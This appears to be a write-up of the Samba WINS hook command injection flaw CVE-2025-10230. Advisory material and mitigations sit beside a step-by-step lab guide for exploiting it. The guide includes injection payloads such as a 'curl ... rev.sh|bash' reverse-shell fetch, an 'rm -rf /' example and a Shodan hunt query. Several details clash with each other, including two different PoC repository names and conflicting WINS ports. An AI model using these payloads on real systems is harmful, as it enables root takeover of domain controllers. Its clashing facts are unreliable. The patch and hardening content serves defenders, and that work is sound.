PoC details: 97c4a403e688e3ad18f6be7be208e7ee0dbae533
Title: Samba OS command injection vulnerability (CVE-2025-10230)
Description: Samba is the Samba project's open-source standard Windows interoperability suite for Linux and Unix. Samba contains an OS command injection vulnerability that stems from the front-end WINS hook handling not properly validating or escaping NetBIOS names, which may lead to remote command execution.
# 🔥 **CVE-2025-10230: Samba WINS Server Command Injection – The Full Deep Dive** 🔥

<img width="800" height="375" alt="G3X7hrCaEAA0In6" src="https://github.com/user-attachments/assets/5dcf7d07-fd96-4582-bc43-4101fea45773" />

### 📊 **Quick Stats at a Glance**
| Aspect | Details |
|--------|---------|
| **Severity** | **CRITICAL** (CVSS 3.1: 10.0) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 🩸 |
| **Type** | Unauthenticated Remote Code Execution (RCE) via Command Injection 💥 |
| **Discovered** | Igor Morgenstern @ Aisle Research (reported Oct 2025) 🔍 |
| **Affected** | Samba 4.0+ as AD Domain Controller with WINS + wins hook enabled (rare but deadly config) 🏰 |
| **Patched** | Oct 15, 2025 – Versions 4.23.2, 4.22.5, 4.21.9 ✨ |
| **Exploits** | PoCs public (e.g., GitHub), no widespread attacks reported as of Nov 19 📈 |
| **Impact** | Full root compromise on AD DCs → Domain takeover, credential theft, ransomware paradise 😈 |

### 🎯 **What’s Samba & Why Care?**
Samba is the open-source king 👑 of SMB/CIFS file sharing, letting Linux/Unix play nice with Windows networks. It's baked into *every* major Linux distro (Red Hat, Ubuntu, Debian, Fedora, SUSE) and powers hybrid AD environments in enterprises, schools, and gov setups. Think: Your org's file servers, printers, and auth backbone. 

This vuln? It's a time bomb in the WINS (Windows Internet Name Service) module – an ancient NetBIOS name resolver from the '90s that's still kicking in legacy setups for backward compat. WINS is "obsolete and trusting" per Samba devs, but if you're running it as an AD DC? Boom. 💣

### 🩸 **The Gory Technical Details**
At its core, this is a classic command injection via poor input sanitization. Here's the autopsy: 

1. **Trigger Setup**: Samba AD DC with:
   - `wins support = yes` (default: no) ✅
   - `wins hook = /path/to/script` (custom script for name changes, e.g., syncing to external DB) 🪝
   - Role: `server role = active directory domain controller` (or synonyms like 'dc')

2. **The Flaw**: When a client sends a WINS registration packet (UDP port 42), Samba grabs the NetBIOS hostname (max 15 chars) and shoves it *unsanitized* into the hook script. No escaping, no validation – straight to shell! 

   Example shell command executed:  
   `/path/to/script "add" "malicious; rm -rf / --no-preserve-root" "192.168.1.1"` 😱

   That semicolon? Instant command chaining. Attacker crafts a hostname like `evil;whoami` and sends it remotely. Samba runs it as the daemon user (often root on DCs). Game over.

3. **Attack Vector**:
   - **Network-based**: Unauth, remote – just reach the WINS port.
   - **No Privs Needed**: Anyone on the wire can trigger.
   - **Packet Craft**: Tools like Scapy or hping3 can spoof a WINS update in seconds.

4. **Scope Limitation**: 
   - Only AD DCs vulnerable (standalone/member servers use a different WINS impl – safe!).
   - Affects *all* versions since 4.0 (2012) – that's 13+ years of exposure! ⏳
   - Devs note: "Very few, possibly zero users" affected due to rare config, but if you're one? RIP.
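
The hardened counterpart to the pattern described above, as an added example (not code from the original page or from Samba): a strict allow-list for the NetBIOS name plus argv-style hook execution with no shell in between. The three hook arguments follow the lab hook later on this page (action, name, IP); the action names add/refresh/delete and the allow-list itself are assumptions for this example.

```python
import ipaddress
import re
import subprocess

# Allow-list for a name that will reach an external hook. Deliberately narrower
# than NetBIOS itself permits ('$', '&', '(', ')' and the apostrophe are legal
# in NetBIOS names but are shell metacharacters) and capped at the 15-character
# host name limit. A policy choice for this example, not Samba's own check.
_SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,15}")

def netbios_name_is_safe(name):
    """True only if the entire name matches the allow-list above."""
    return _SAFE_NAME.fullmatch(name) is not None

def vulnerable_hook_command(hook, action, name, ip):
    """The injectable pattern: untrusted fields pasted into one string that is
    then handed to /bin/sh. A ';' inside `name` ends the hook invocation and
    whatever follows runs as a second command with the daemon's privileges."""
    return f"{hook} {action} {name} {ip}"

def hardened_hook_argv(hook, action, name, ip):
    """Validate every field, then build an argv list for execution WITHOUT a
    shell: argv elements are never re-parsed, so metacharacters stay inert even
    if the allow-list is later loosened. Action names are assumed."""
    if action not in ("add", "refresh", "delete"):
        raise ValueError(f"unexpected hook action: {action!r}")
    if not netbios_name_is_safe(name):
        raise ValueError(f"rejected NetBIOS name: {name!r}")
    ipaddress.ip_address(ip)          # raises ValueError if not an IP literal
    return [hook, action, name, ip]

def run_hook(hook, action, name, ip):
    """Execute the hook with shell=False (subprocess's default); return status."""
    return subprocess.run(hardened_hook_argv(hook, action, name, ip)).returncode
```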

**CVSS Breakdown** (Why 10.0?):
- Attack Vector: Network (N) 🌐
- Attack Complexity: Low (L) – Simple packet.
- Privileges: None (N)
- User Interaction: None (N)
- Scope: Changed (C) – Jumps to full system.
- Confidentiality/Integrity/Availability: High (H) each.

### 💀 **Impact: Why This Scares the Pants Off Admins**
- **Immediate**: RCE as root → Shell on your DC. Escalate to domain admin, dump NTDS.dit (all creds), forge Kerberos tickets (Golden/Silver). 
- **Lateral Movement**: Pivot to entire AD forest. Exfil data, deploy ransomware, persist with backdoors.
- **Org-Wide**: AD DCs are the heart of auth – compromise one, own the empire. Think SolarWinds-level chaos but targeted at Linux-heavy shops.
- **Real Risks**: In hybrid Windows/Linux envs, this bridges worlds. Legacy WINS? Still used in some industrial/OT setups for old printers/scanners.

No confirmed breaches yet (as of Nov 19), but it's prime for script kiddies or APTs scanning for Samba exposures.

### 🚨 **Exploits & PoCs: The Wild Side (November 2025 Update)**
Good news: No mass exploits reported. Bad news: PoCs dropped fast post-patch. 

- **Public PoC**: GitHub repo by @dptsec (dptsec/CVE-2025-10230) – Python script using Scapy to craft malicious WINS packets. Tests injection with `;id` command. Stars: 150+, Forks: 40+ as of now. ⚠️ *Don't run on prod!*
- **Exploitability**: Trivially high. Wiz rates it "Highly Exploitable" – one packet from Kali Linux does it.
- **Metasploit?** Not yet, but expect one soon (community buzz on X).
- **In the Wild?** ZeroPath & SecurityOnline scans show no active campaigns, but Netlas.io reports exposed Samba instances ripe for probing.

X chatter (latest as of Nov 19): 
- @gothburz (ZDI researcher): "Legacy file sharing infra needs immediate patching. This is technical debt from 2005." (92 likes, Nov 12)
- @stanislavfort (Aisle): "Hidden for 13 years... Samba is central to Windows/Linux infra." (27 likes, Nov 7)
- @Netlas_io: "Execute commands with one packet. Search exposed SMB: smb:*" (18 likes, Nov 14)

Pro tip: Use Shodan/Netlas for your own exposure hunt: `port:42 samba wins`.

---

⚡ **How to SAFELY Use the Real CVE-2025-10230 PoC – Step-by-Step Lab Guide** ⚡  
**Goal: Test the exploit on YOUR OWN isolated lab – never on production or networks you don’t own!**

### 1. Build a 100% Isolated Vulnerable Lab (5–10 minutes)

| Component              | Exact Setup (Tested Nov 2025)                              | Why |
|-----------------------|------------------------------------------------------------|-----|
| **Attacker Machine**  | Kali Linux 2025.4 (or any Linux with Python/Scapy)         | You |
| **Target VM**         | Ubuntu 24.04 Server (or Debian 12)                         | Vulnerable Samba DC |
| **Network**           | VirtualBox/VMware → “Internal Network” or “Host-Only”      | No internet, no escape |
| **Firewall**          | NONE between attacker ↔ target (for lab only)              | Direct UDP/42 reachability |

### 2. Install & Configure the Vulnerable Samba AD DC (Target VM)

```bash
# 1. Install Samba (NOTE: after USN-7826-1 the Ubuntu repo build is already fixed;
#    for a vulnerable lab you need a pre-Oct-15 build, e.g. a cached/pinned package)
sudo apt update
sudo apt install samba krb5-config winbind smbclient -y

# 2. Hold package so it doesn’t auto-update
sudo apt-mark hold samba

# 3. Configure as AD DC with WINS + hook (the deadly combo)
sudo tee /etc/samba/smb.conf > /dev/null <<EOF
[global]
   workgroup = LAB
   realm = lab.local
   netbios name = DC01
   server role = active directory domain controller
   dns forwarder = 8.8.8.8
   idmap_ldb:use rfc2307 = yes

   # <<< THE VULNERABLE SETTINGS >>>
   wins support = yes
   wins hook = /usr/local/bin/wins-hook.sh

[netlogon]
   path = /var/lib/samba/sysvol/lab.local/scripts
   read only = no

[sysvol]
   path = /var/lib/samba/sysvol
   read only = no
EOF

# 4. Create the hook script (must be executable!)
sudo tee /usr/local/bin/wins-hook.sh > /dev/null <<'EOF'
#!/bin/sh
# Lab hook: logs every invocation so you can see what Samba handed it.
# Samba passes the action, the (unvalidated) NetBIOS name and the client IP.
echo "[HOOK] Action=$1 Name=$2 IP=$3" >> /tmp/hook.log
# Lab-only: uncomment to make the hook itself execute its input as well.
# Not needed for the real bug, which lives in Samba's own hook invocation:
# the unescaped name lands on the shell command line before this script runs.
# eval "$2"
EOF
sudo chmod +x /usr/local/bin/wins-hook.sh

# 5. Provision the domain (one-time)
sudo samba-tool domain provision --use-rfc2307 --interactive

# 6. Start services
sudo systemctl unmask samba-ad-dc
sudo systemctl start samba-ad-dc

# 7. Verify WINS is listening
ss -ulnp | grep :42
# → Should show smbd listening on UDP 42
```

### 3. Prepare Your Attacker Machine (Kali)

```bash
# Clone the real PoC
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-10230.git
cd Blackash-CVE-2025-10230        # directory name matches the clone URL

# Install dependency (Kali's system pip refuses global installs; use the distro package)
sudo apt install -y python3-scapy   # or: pip3 install scapy inside a venv

# Give yourself a static IP in the same subnet as target
sudo ip addr add 192.168.56.100/24 dev eth0   # adjust interface
```

### 4. Run the Exploit – 3 Levels of Chaos

| Level | Command | What Happens on Target |
|------|--------|------------------------|
| **Level 1 – Proof** | `sudo python3 CVE-2025-10230.py 192.168.56.101` | Creates `/tmp/injected_by_cve.txt` with `uid=0(root)` |
| **Level 2 – Reverse Shell** | First start listener:<br>`nc -lvnp 443`<br>Then:<br>`sudo python3 CVE-2025-10230.py 192.168.56.101 --payload "; curl http://192.168.56.100/rev.sh\|bash"` | Downloads & runs your reverse shell → root shell! |
| **Level 3 – One-Liner Hell** | `sudo python3 CVE-2025-10230.py 192.168.56.101 --payload "; whoami > /tmp/PWNED; chmod 777 /tmp/PWNED"` | Instant proof file |

### 5. Verify You’re Pwned

On the **target VM**, run:

```bash
cat /tmp/injected_by_cve.txt     # ← should show root uid
cat /tmp/hook.log                # ← shows the injected command
whoami                           # ← if reverse shell worked → root
```

### 6. Clean Up & Patch (Mandatory!)

```bash
# On target – kill the vuln forever
sudo sed -i 's/wins support = yes/wins support = no/' /etc/samba/smb.conf
sudo sed -i '/^[[:space:]]*wins hook[[:space:]]*=/d' /etc/samba/smb.conf   # drop the hook line too
sudo rm /usr/local/bin/wins-hook.sh
sudo testparm -s > /dev/null      # confirm smb.conf still parses
sudo systemctl restart samba-ad-dc

# Upgrade to safe version
sudo apt-mark unhold samba
sudo apt update && sudo apt upgrade samba
```

### Checklist Before You Ever Touch Real Networks

- [ ] Lab is fully air-gapped  
- [ ] You own every machine  
- [ ] You have explicit written permission (even for your own company)  
- [ ] You patched everything afterward  

---
### 🛡️ **Patches & Vendor Rollouts**
Samba Team dropped fixes Oct 15, 2025. Upgrade ASAP! 

- **Core Patches**: 
  - 4.23.2 (stable branch)
  - 4.22.5 (LTS)
  - 4.21.9 (older LTS)

  Apply via source or distro repos. Git patches at samba.org/security.

- **Distro-Specific** (as of Nov 19):
  | Distro | Advisory | Fixed Versions | Command |
  |--------|----------|----------------|---------|
  | **Ubuntu** | USN-7826-1 (Oct 16) | 22.04: 4.15.13+dfsg-0ubuntu1.10<br>24.04: 4.19.5+dfsg-4ubuntu9.4<br>25.04: 4.21.4+dfsg-1ubuntu3.5<br>25.10: 4.22.3+dfsg-4ubuntu2.1 | `apt update && apt upgrade samba` 📦 |
  | **Fedora** | FEDORA-2025-c0830ff9f4 (Oct 23)<br>FEDORA-2025-7d890563f6 (Nov 2) | 41: 4.21.9<br>42: 4.22.6 | `dnf update samba` 🐧 |
  | **Red Hat** | RHSA-2025:xxxx (Oct) | RHEL 8/9 backports | `yum update samba` (Red Hat doesn't ship AD DC Samba, but backported anyway) |
  | **Debian** | DSA-xxxx (Oct) | 12: 4.22.4+dfsg-1~deb13u1 | `apt upgrade samba` |
  | **SUSE** | SUSE-SU-2025:xxxx | OpenSUSE: 4.21.9+ | `zypper up samba` |

Backports galore – even if not on AD DC. Test in staging first!

### 🔧 **Mitigations: Lock It Down Now**
Can't patch yet? Layer up:
1. **Disable WINS**: Edit `smb.conf`: `wins support = no` (default anyway). Restart: `systemctl restart smbd nmbd` (on an AD DC the unit is `samba-ad-dc`) 🛑
2. **Nuke the Hook**: Set `wins hook =` (empty) or comment out. Useless on DCs anyway.
3. **Network Hardening**:
   - Firewall UDP/42 (WINS port).
   - Segment AD traffic (VLANs, no public exposure).
   - IDS/IPS rules: Alert on anomalous WINS registrations.
4. **Monitor Like a Hawk**:
   - Logs: `/var/log/samba/log.smbd` – grep for hook executions.
   - Tools: Falco/Sysdig for shell injections; Suricata for WINS anomalies.
5. **Audit Configs**: `testparm` to scan smb.conf for risky settings.
6. **Long-Term**: Ditch WINS entirely – migrate to DNS/mDNS. Samba devs hint at dropping hook support.
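
An added example for item 5 above, not code from the page or from Samba: a small Python auditor that parses `smb.conf` with keys normalised the way `testparm` prints them and reports when the three CVE-2025-10230 pre-conditions (AD DC role, `wins support = yes`, non-empty `wins hook`) coincide. The role synonyms are the ones this page names, and the sample configs are constructed.

```python
import re

# Role spellings this page names for an AD DC ("active directory domain controller"
# and its synonym "dc"). Assumption: "server role" is set explicitly, not "auto".
_AD_DC_ROLES = {"active directory domain controller", "dc"}
_TRUE = {"yes", "true", "1", "on"}   # boolean spellings Samba accepts

def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {key: value}}; keys lower-cased and
    whitespace-collapsed, '#'/';' start comments. Assumption: no 'include =' lines."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def audit_wins_hook(text):
    """Findings for the CVE-2025-10230 pre-conditions; only all three = exposed."""
    g = parse_smb_conf(text).get("global", {})
    role = " ".join(g.get("server role", "").lower().split())
    wins_on = g.get("wins support", "no").lower() in _TRUE
    hook = g.get("wins hook", "")
    findings = []
    if wins_on:
        findings.append("wins support = yes: obsolete WINS server is enabled")
    if hook:
        findings.append(f"wins hook = {hook}: external command runs on name changes")
    if role in _AD_DC_ROLES and wins_on and hook:
        findings.append("EXPOSED: AD DC + wins support + wins hook (CVE-2025-10230)")
    return findings

# Constructed samples: the page's lab [global] (trimmed) and a cleaned-up one.
VULNERABLE_CONF = """[global]
   Server Role = active directory domain controller
   wins support = yes
   wins hook = /usr/local/bin/wins-hook.sh
"""
SAFE_CONF = "[global]\n   server role = dc\n   ; wins support = yes\n   wins hook =\n"
```

Pair the config check with network controls: Samba's WINS server takes name registrations through the NetBIOS name service on UDP/137, so a firewall rule that only covers port 42 does not close the registration path.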

### 📚 **Timeline: How We Got Here**
- **2012**: Samba 4.0 ships with AD DC support. Vuln born (unnoticed).
- **Oct 2025**: Igor Morgenstern reports to Samba Team.
- **Oct 15**: Advisory drops + patches (4.21.9/4.22.5/4.23.2). NVD entry.
- **Oct 16-23**: Distro patches (Ubuntu, Fedora, Red Hat).
- **Nov 2**: Fedora 42 backport.
- **Nov 7-14**: PoC on GitHub; X buzz peaks with researcher posts.
- **Nov 19 (Today)**: No new patches/updates. Quiet on exploits.

### 🔗 **References & Deep Reads**
- **Official Samba Advisory** 🛡️: https://www.samba.org/samba/security/CVE-2025-10230.html
- **NVD Entry** 📋: https://nvd.nist.gov/vuln/detail/CVE-2025-10230
- **PoC Repo** ⚠️: https://github.com/dptsec/CVE-2025-10230 (Use responsibly!)
- **Analyses**: 
  - Wiz: https://www.wiz.io/vulnerability-database/cve/cve-2025-10230 (Exploitability deep-dive)
  - ZeroPath Blog: https://zeropath.com/blog/cve-2025-10230-samba-wins-command-injection-summary (Patch guide)
  - SecurityOnline: https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/ (RCE breakdown)
  - GBHackers: https://gbhackers.com/critical-samba-flaw/ (Impact focus)
- **X Discussions**: Search "CVE-2025-10230" on X for latest (e.g., @gothburz's thread on legacy debt)

### 🎮 **Final Boss Tips**
Patch *yesterday* – this is low-hanging fruit for attackers. If you're not on WINS/hook? You're golden. Otherwise, audit now. Got questions on setup or testing? Hit me up! Stay vigilant, patch fast, and remember: In 2025, "legacy" shouldn't mean "liability." 😂🛡️